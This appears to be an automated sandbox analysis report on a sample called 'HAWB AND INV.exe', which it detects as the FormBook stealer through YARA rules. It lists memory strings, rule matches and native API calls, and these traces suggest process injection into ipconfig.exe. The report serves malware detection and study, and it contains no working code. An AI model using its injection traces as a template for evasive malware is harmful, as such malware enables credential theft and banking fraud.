Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: HAWB AND INV.exe | String found in binary or memory: https://github.com/unguest
Source: HAWB AND INV.exe | String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmp | String found in binary or memory: https://go.cpanel.net/privacy
Source: powershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmp | String found in binary or memory: https://go.microX%
Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_004181B0 NtCreateFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00418260 NtReadFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_004182E0 NtClose,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00418390 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_004181AA NtCreateFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041825A NtReadFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012199A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012198F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012195D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012197A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012196E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219950 NtQueueApcThread,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012199D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219820 NtEnumerateKey,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121B040 NtSuspendThread,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012198A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219B00 NtSetValueKey,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A10 NtQuerySection,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219560 NtWriteFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012195F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219760 NtOpenProcess,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121A770 NtOpenThread,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219770 NtSetInformationFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219650 NtQueryValueKey,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012196D0 NtCreateKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B199A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B196E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B196D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B195D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A20 NtResumeThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A10 NtQuerySection,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B198A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B198F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B199D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B197A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1A770 NtOpenThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19760 NtOpenProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B195F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19560 NtWriteFile,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_001281B0 NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00128260 NtReadFile,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_001282E0 NtClose,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_001281AA NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012825A NtReadFile,
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_012AC3A0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_012AA758
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_012AF838
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_058320B0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_058320C0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05831038
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05831D98
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05831DF0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05830FF4
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05833F41
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05833F50
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05831911
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05831920
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05836A18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_02E8E750
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041C84F
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00401026
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00401030
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041C1F0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00408C50
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041BC3A
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041CD1A
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041C5F3
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041B584
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00402D88
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00402D90
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041CE7B
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041BE26
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041C7D9
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00402FB0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_011DF900
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_011F4120
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01291002
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012020A0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A20A8
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_011EB090
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A28EC
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A2B28
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0120EBB0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0129DBD2
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A22AE
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A2D07
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_011D0D20
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A1D55
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01202581
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A25DD
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_011ED5E0
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_011E841F
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0129D466
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A1FF1
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_011F6E30
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0129D616
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012A2EF7
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA22AE
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B0EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B9DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA2B28
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B020A0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA20A8
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AEB090
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA28EC
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BAE824
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B91002
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AF4120
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02ADF900
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA2EF7
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AF6E30
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B9D616
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA1FF1
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AE841F
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B9D466
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B02581
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AED5E0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA25DD
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AD0D20
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA2D07
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA1D55
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012C84F
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012BC3A
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00118C50
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00112D90
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012B584
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00112D88
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012C5F3
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00112FB0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012C7D9
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02ADB150 appears 35 times
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: String function: 011DB150 appears 35 times
Source: HAWB AND INV.exe | Binary or memory string: OriginalFilename vs HAWB AND INV.exe
Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs HAWB AND INV.exe
Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs HAWB AND INV.exe
Source: HAWB AND INV.exe, 00000000.00000002.363402350.00000000060D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs HAWB AND INV.exe
Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs HAWB AND INV.exe
Source: HAWB AND INV.exe, 00000000.00000002.363989831.000000000BD40000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs HAWB AND INV.exe
Source: HAWB AND INV.exe | Binary or memory string: OriginalFilename vs HAWB AND INV.exe
Source: HAWB AND INV.exe, 0000000A.00000002.485481654.0000000003107000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs HAWB AND INV.exe
Source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HAWB AND INV.exe
Source: HAWB AND INV.exe | Binary or memory string: OriginalFilenameTOKENPRIMARYGROUP.exe6 vs HAWB AND INV.exe
Source: HAWB AND INV.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
